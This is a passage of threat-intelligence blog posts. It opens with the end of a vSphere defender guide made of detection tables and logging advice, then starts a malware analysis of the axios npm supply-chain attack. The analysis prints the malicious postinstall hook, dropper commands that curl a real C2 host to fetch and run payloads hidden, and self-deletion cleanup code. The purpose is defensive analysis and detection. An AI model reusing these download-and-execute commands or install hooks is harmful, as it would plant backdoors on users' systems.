16px;"> <p><span style="vertical-align: baseline;">Management Plane (API/UI)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Programmatic Event IDs: VmClonedEvent, VibInstalledEvent, HostSshEnabledEvent</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Initial Access / Exfiltration</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Tells you "</span><strong style="vertical-align: baseline;">What</strong><span style="vertical-align: baseline;">" high-level action was performed (e.g., a domain controller was cloned) and the Admin IP responsible.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Identity (SSO) Events</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Identity Layer</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Principal Events: com.vmware.sso.PrincipalManagement</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Establish Persistence </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Detects "</span><strong style="vertical-align: baseline;">Who</strong><span style="vertical-align: baseline;">" was created. Specifically catches the transient accounts used as deployment vehicles for backdoors.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">AuditD Kernel Logs</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">OS Kernel (Photon OS)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Syscall Keys: key="execpriv", key="useradd", key="privileged"</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Establish Persistence </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Tells you "</span><strong style="vertical-align: baseline;">How</strong><span style="vertical-align: baseline;">" the shell was used. Captures commands typed by an intruder (e.g., sudo, sed, rpm) even if they delete their bash history.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">AIDE Integrity </strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Filesystem</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Syslog Tag: AIDE_TRAP stating: "differences found between database and filesystem"</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Establish Persistence</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Tells you "</span><strong style="vertical-align: baseline;">What </strong><span style="vertical-align: baseline;">was modified" to ensure residency. Detects physical changes to binaries and startup scripts that standard logs miss.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">IPtables OS Firewall</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Network Layer (Host-Based)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Kernel Message: VCSA_FW_DROP + Source IP + Destination Port</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Initial Access / Lateral Movement </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Tells you "</span><strong style="vertical-align: baseline;">Who</strong><span style="vertical-align: baseline;"> is probing?". Identifies compromised internal VMs attempting to scan or brute-force VCSA management ports (SSH/VAMI).</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">vSphere VCSA logging</span></div></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Implementation Best Practices</span></h5> <p><span style="vertical-align: baseline;">For both the VCSA and ESXi hosts, the implementation of remote syslog should move beyond legacy, unencrypted protocols. The following standards are required to ensure the integrity and survivability of the forensic trail:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Encryption via TLS (TCP Port 6514):</strong><span style="vertical-align: baseline;"> Sending logs over UDP/514 is insecure and unreliable. Threat actors can access management traffic or spoof log entries. Organizations should enforce TCP with TLS encryption for all syslog traffic. This ensures that logs are encrypted in transit and guarantees delivery through the TCP handshake.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Certificate Validation:</strong><span style="vertical-align: baseline;"> To prevent man-in-the-middle (MitM) attacks on the logging pipeline, the VCSA and ESXi hosts should be configured to validate the SSL certificate of the remote syslog server. This ensures that telemetry is being sent to a verified security authority and not a rogue listener controlled by the attacker.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">VCSA Custom Shell Bridging:</strong><span style="vertical-align: baseline;"> Because the VCSA does not forward shell activity or denied firewall connections by default, administrators should consider implementing an agentless bridge at the Photon OS level. By configuring the </span><code style="vertical-align: baseline;">audisp</code><span style="vertical-align: baseline;"> (Audit Dispatcher) and piping </span><code style="vertical-align: baseline;">iptables</code><span style="vertical-align: baseline;"> logs into the native rsyslog service, the VCSA is transformed from a passive appliance into an active sensor, capable of streaming real-time kernel-level alerts directly into the encrypted TLS pipeline.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Standardized Retention:</strong><span style="vertical-align: baseline;"> Given this threat actor's dwell time averages 393 days, the remote syslog repository should be configured with a minimum retention period of 400 days. This allows investigators to correlate the programmatic </span><code style="vertical-align: baseline;">eventTypeId</code><span style="vertical-align: baseline;"> of a year-old initial compromise with the low-level auditd signals of a current breach.</span></p> </li> </ul> <h5><span style="vertical-align: baseline;">Summary of Logging Detections</span></h5></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Attack Phase</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">TTP</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Key Forensic Log Source(s)</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Technical Detail </strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Initial Access</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Edge Appliance Exploitation</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Tomcat Audit Logs: /home/kos/auditlog/fapi_cl_audit_log.log</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Detects requests to /manager/text/deploy (CVE-2026-22769) to deploy malicious WAR files like </span><strong style="vertical-align: baseline;">SLAYSTYLE</strong><span style="vertical-align: baseline;">.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Reconnaissance &amp; Scanning</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">VCSA firewall_audit: </span><strong style="vertical-align: baseline;">SSH_BLOCKED_NEW,</strong><span style="vertical-align: baseline;"> </span><strong style="vertical-align: baseline;">WEB_BLOCKED_NEW</strong><span style="vertical-align: baseline;">, </span><strong style="vertical-align: baseline;">VAMI_BLOCKED_NEW</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Identifies attempts to probe management ports (22, 443, 5480) from unauthorized, non-whitelisted IPs.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Lateral Movement</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Credential Abuse</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Windows Event 4624 (Type 3); VCSA firewall_audit: </span><strong style="vertical-align: baseline;">ALLOWED SSH</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Detects network logins from appliance IPs using stolen service account credentials.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Stealth Pivoting (Ghost NICs)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vCenter Events: </span><strong style="vertical-align: baseline;">VmNetworkAdapterAddedEvent</strong><span style="vertical-align: baseline;"> (8.0u3+) or </span><strong style="vertical-align: baseline;">VmReconfiguredEvent</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VmNetworkAdapterAddedEvent </strong><span style="vertical-align: baseline;">is a high-fidelity "Critical" signal for bridging VMs into restricted networks. Legacy builds use </span><strong style="vertical-align: baseline;">VmReconfiguredEvent </strong><span style="vertical-align: baseline;">to track unauthorized NIC additions.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Takeover</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Management Interface Access</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VAMI Logs</strong><span style="vertical-align: baseline;">: /var/log/vmware/vami/vami-httpd.log</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Records POST requests to /rest/com/vmware/cis/session followed by SSH enablement via PUT requests on port 5480.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Interactive Shell Escape</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SSO Audit (PrincipalManagement); VCSA </span><strong style="vertical-align: baseline;">SHELL_COMMAND</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitors membership changes to </span><strong style="vertical-align: baseline;">BashShellAdministrators</strong><span style="vertical-align: baseline;"> to escape VAMI to bash; tracks interactive commands like whoami or netstat.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Persistence</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Startup Script Injections</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AuditD Key -k startup_scripts; VCSA init files</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Detects</span><strong style="vertical-align: baseline;"> sed</strong><span style="vertical-align: baseline;"> commands modifying /etc/sysconfig/init or /opt/vmware/etc/init.d/vami-lighttp.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Transient SSO Accounts</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SSO Audit (audit_events.log)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Rapid creation and deletion of local accounts (e.g., in vsphere.local) used solely for malware deployment.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Filesystem Integrity / Binary</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AIDE Monitor (</span><strong style="vertical-align: baseline;">AIDE_TRAP</strong><span style="vertical-align: baseline;">); AuditD Key -k execpriv</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Detects physical changes to binaries in</span><strong style="vertical-align: baseline;"> /lib64 </strong><span style="vertical-align: baseline;">or </span><strong style="vertical-align: baseline;">/root/.ssh</strong><span style="vertical-align: baseline;"> and execution of unauthorized binaries like</span><strong style="vertical-align: baseline;"> vmsrc</strong><span style="vertical-align: baseline;">.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Rogue "Ghost VMs"</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AUDIT log</span></p> <p><span style="vertical-align: baseline;">“vmx -x” /var/log/shell.log</span></p> <p><span style="vertical-align: baseline;">“/bin/vmx” /var/log/shell.log</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Detection of unregistered virtual machine files (.vmx) hidden from standard management consoles.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Credential Theft</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Tomcat Memory Scraping</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vCenter Web Logs; AuditD Key -k privileged</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitors HTTP requests to /web/saml2/sso/* </span><strong style="vertical-align: baseline;">(BRICKSTEAL</strong><span style="vertical-align: baseline;">); tracks sudo usage for scraping memory or DB credentials.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Offline NTDS.dit Theft</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vCenter Events; vCenter VPXD Logs; ESXi hostd.log</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VmClonedEvent</strong><span style="vertical-align: baseline;"> or </span><strong style="vertical-align: baseline;">VmBeingClonedEvent</strong><span style="vertical-align: baseline;"> targeting domain controllers followed by </span><strong style="vertical-align: baseline;">VmDiskHotPlugEvent</strong><span style="vertical-align: baseline;"> to mount disks offline to extract the ntds.dit database.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Exfiltration</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 &amp; Data Tunnelling</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">VCSA firewall_audit: </span><strong style="vertical-align: baseline;">INTERNET_BLOCKED</strong><span style="vertical-align: baseline;">, </span><strong style="vertical-align: baseline;">ZT_OUTBOUND_DENIED</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Captures VCSA attempting unauthorized outbound calls to external C2 nodes via SOCKS proxies or DoH.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Mapping of logging and detections</span></div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Conclusion</span></h3> <p><span style="vertical-align: baseline;">It is critical for organizations to recognize that the vCenter Server control plane is a primary target for state-sponsored espionage and global ransomware operations. Technical hardening is essential to create the friction required to generate high-fidelity signals. By enforcing barriers such as VCSA OS-level firewalls, phishing-resistant MFA, and restricted management interfaces, organizations force a threat actor to attempt actions that are inherently suspicious.</span></p> <p><span style="vertical-align: baseline;">Addressing forensic visibility gaps through the implementation of auditd, AIDE, and centralized remote logging ensures that evidence of persistence is preserved for incident response activities. Organizations should leverage this enhanced telemetry to build pattern-based behavioral detections rather than relying on static Indicators of Compromise (IoCs). As adversaries </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools?linkId=60744246"><span style="text-decoration: underline; vertical-align: baseline;">increasingly leverage AI</span></a><span style="vertical-align: baseline;"> across the entire attack lifecycle, the hardening and logging controls outlined in this guide should become the universal vSphere security baseline to ensure every unauthorized movement results in an immediate and immutable forensic response.</span></p></div>Thu, 02 Apr 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/vsphere-brickstorm-defender-guide/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/vsphere-brickstorm-defender-guide/Mandiant https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package/<div class="block-paragraph_advanced"><p>Written by: Austin Larsen, Dima Lenz, Adrian Hernandez, Tyler McLellan, Christopher Gardner, Ashley Zaya, Michael Rudden, Mon Liclican</p> <hr/></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">Google Threat Intelligence Group (GTIG) is tracking an active software supply chain attack targeting the popular Node Package Manager (NPM) package "</span><a href="https://www.npmjs.com/package/axios" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">axios</span></a><span style="vertical-align: baseline;">." Between March 31, 2026, 00:21 and 03:20 UTC, an attacker introduced a malicious dependency named "</span><code style="vertical-align: baseline;">plain-crypto-js</code>"<span style="vertical-align: baseline;"> into axios NPM releases versions 1.14.1 and 0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, and these packages typically have over 100 million and 83 million weekly downloads, respectively. This malicious dependency is an obfuscated dropper that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.</span></p> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">GTIG attributes this activity to </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering"><span style="text-decoration: underline; vertical-align: baseline;">UNC1069</span></a><span style="vertical-align: baseline;">, a financially motivated North Korea-nexus threat actor active since at least 2018, based on the use of </span><span style="vertical-align: baseline;">WAVESHAPER.V2</span><span style="vertical-align: baseline;">, an updated version of </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering"><span style="text-decoration: underline; vertical-align: baseline;">WAVESHAPER</span></a><span style="vertical-align: baseline;"> previously used by this threat actor</span><span style="vertical-align: baseline;">. Further, analysis of infrastructure artifacts used in this attack shows overlaps with infrastructure used by UNC1069 in past activities</span>.</span></p> <p><span style="vertical-align: baseline;">This blog details the attack lifecycle, from the initial account compromise to the deployment of operating system (OS)-specific payloads, and provides actionable guidance for defenders to identify and mitigate this threat.</span></p> <h3><span style="vertical-align: baseline;">Campaign Overview</span></h3> <p><span style="vertical-align: baseline;">On March 31, 2026, GTIG observed the introduction of </span><code style="vertical-align: baseline;">plain-crypto-js</code><span style="vertical-align: baseline;"> version 4.2.1 as a dependency in the legitimate </span><code style="vertical-align: baseline;">axios</code><span style="vertical-align: baseline;"> package version 1.14.1. Analysis indicates the maintainer account associated with the </span><code style="vertical-align: baseline;">axios</code><span style="vertical-align: baseline;"> package was compromised, with the associated email address changed to an attacker-controlled account (</span><code style="vertical-align: baseline;">ifstap@proton.me</code><span style="vertical-align: baseline;">).</span></p> <p><span style="vertical-align: baseline;">The threat actor used the </span><code style="vertical-align: baseline;">postinstall</code><span style="vertical-align: baseline;"> hook within the "</span><code style="vertical-align: baseline;">package.json"</code><span style="vertical-align: baseline;"> file of the malicious dependency to achieve silent execution. Upon installation of the compromised </span><code style="vertical-align: baseline;">axios</code><span style="vertical-align: baseline;"> package, NPM automatically executes an obfuscated JavaScript dropper named "</span><code style="vertical-align: baseline;">setup.js"</code><span style="vertical-align: baseline;"> in the background.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code> "scripts": { "test": "echo \"Error: no test specified\" &amp;&amp; exit 1", "postinstall": "node setup.js" }</code></pre></div> <div class="block-paragraph_advanced"><h3><strong style="vertical-align: baseline;">Malware </strong><span style="vertical-align: baseline;">Analysis</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">The </span><code style="vertical-align: baseline;">plain-crypto-js</code><span style="vertical-align: baseline;"> package serves as a payload delivery vehicle. The core component, SILKBELL, </span><code style="vertical-align: baseline;">setup.js</code><span style="vertical-align: baseline;"> (SHA256: </span><code style="vertical-align: baseline;">e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09</code><span style="vertical-align: baseline;">), dynamically checks the target system's operating system upon execution to deliver platform-specific payloads.</span></p> <p><span style="vertical-align: baseline;">The script uses a custom XOR and Base64-based string obfuscation routine to conceal the command-and-control (C2 or C&amp;C) URL and host OS execution commands. To evade static analysis, it dynamically loads </span><code style="vertical-align: baseline;">fs</code><span style="vertical-align: baseline;">, </span><code style="vertical-align: baseline;">os</code><span style="vertical-align: baseline;">, and </span><code style="vertical-align: baseline;">execSync</code><span style="vertical-align: baseline;">. After successfully dropping the secondary payload, </span><code style="vertical-align: baseline;">setup.js</code><span style="vertical-align: baseline;"> attempts to delete itself and revert the modified </span><code style="vertical-align: baseline;">package.json</code><span style="vertical-align: baseline;"> to hide forensic traces of the </span><code style="vertical-align: baseline;">postinstall</code><span style="vertical-align: baseline;"> hook.</span></p> <h4><span style="vertical-align: baseline;">Operating System-Specific Execution Paths</span></h4> <p><span style="vertical-align: baseline;">Depending on the identified platform, the dropper executes the following routines.</span></p> <h5><span style="vertical-align: baseline;">Windows</span></h5> <p><span style="vertical-align: baseline;">The dropper actively hunts for the native </span><code style="vertical-align: baseline;">powershell.exe</code><span style="vertical-align: baseline;"> binary. To evade detection, it copies the legitimate executable to </span><code style="vertical-align: baseline;">%PROGRAMDATA%\wt.exe</code><span style="vertical-align: baseline;">. It then downloads a PowerShell script via </span><code style="vertical-align: baseline;">curl</code><span style="vertical-align: baseline;"> using the POST body </span><code style="vertical-align: baseline;">packages.npm.org/product1</code><span style="vertical-align: baseline;"> and saves it to the user's AppData Temp directory (e.g., </span><code style="vertical-align: baseline;">%TEMP%\6202033.ps1</code><span style="vertical-align: baseline;">). The payload is executed using a copied Windows Terminal executable with hidden and execution policy bypass flags.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Set objShell = CreateObject("WScript.Shell") objShell.Run "cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 &gt; %TEMP%\6202033.ps1 &amp; %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1 http://sfrclak[.]com:8000/6202033 &amp; del ""PS_PATH"" /f", 0, False</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">macOS</span></h5> <p><span style="vertical-align: baseline;">The malware uses </span><code style="vertical-align: baseline;">bash</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">curl</code><span style="vertical-align: baseline;"> to download a native Mach-O binary payload to </span><code style="vertical-align: baseline;">/Library/Caches/com.apple.act.mond</code><span style="vertical-align: baseline;"> using the POST body </span><code style="vertical-align: baseline;">packages.npm.org/product0</code><span style="vertical-align: baseline;">. It modifies permissions to make the file executable and launches it via </span><code style="vertical-align: baseline;">zsh</code><span style="vertical-align: baseline;"> in the background.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>try do shell script " curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s http://sfrclak.com:8000/6202033 &amp;&amp; chmod 770 /Library/Caches/com.apple.act.mond &amp;&amp; /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &amp;" &amp;&gt; /dev/null" " end try do shell script "rm -rf tmp/6202033"</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Linux</span></h5> <p><span style="vertical-align: baseline;">The script downloads a Python backdoor to </span><code style="vertical-align: baseline;">/tmp/ld.py</code><span style="vertical-align: baseline;"> using the POST body </span><code style="vertical-align: baseline;">packages.npm.org/product2</code><span style="vertical-align: baseline;">.</span></p> <h5><span style="vertical-align: baseline;">Cleanup</span><span style="font-style: italic; vertical-align: baseline;"> </span></h5> <p><span style="vertical-align: baseline;">Aside from removing downloaded scripts in two execution branches, the script attempts to remove itself and replace an injected package.json with an original one, which was stored as "</span><code style="vertical-align: baseline;">package.md</code><span style="vertical-align: baseline;">".</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>const K = __filename; t.unlink(K, (x =&gt; {})) t.unlink('package.json', (x =&gt; {})), t.rename('package.md', 'package.json', ord)</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">WAVESHAPER.V2 Backdoor Capabilities</span></h4> <p><span style="vertical-align: baseline;">The platform-specific payloads ultimately deploy variants of a backdoor tracked by GTIG as WAVESHAPER.V2, a backdoor written in C++ that targets macOS to collect system information, enumerate directories, or execute additional payloads and that connects to the C2 provided via command-line arguments. Notably, GTIG identified additional variants of WAVESHAPER.V2 written in PowerShell and Python to target diverse environments. Regardless of the operating system, the malware beacons to the C2 endpoint over port 8000 at 60-second intervals. The beacon consists of Base64-encoded JSON data and uses a hard-coded User-Agent: </span></p> <p><code style="vertical-align: baseline;">mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code></p> <p><span style="vertical-align: baseline;">Following the initial beaconing to the adversary infrastructure, WAVESHAPER.V2 continuously polls, pausing for 60 seconds awaiting instructions. The server response determines the next action taken by the implant. The backdoor supports multiple commands outlined in the Table 1.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: 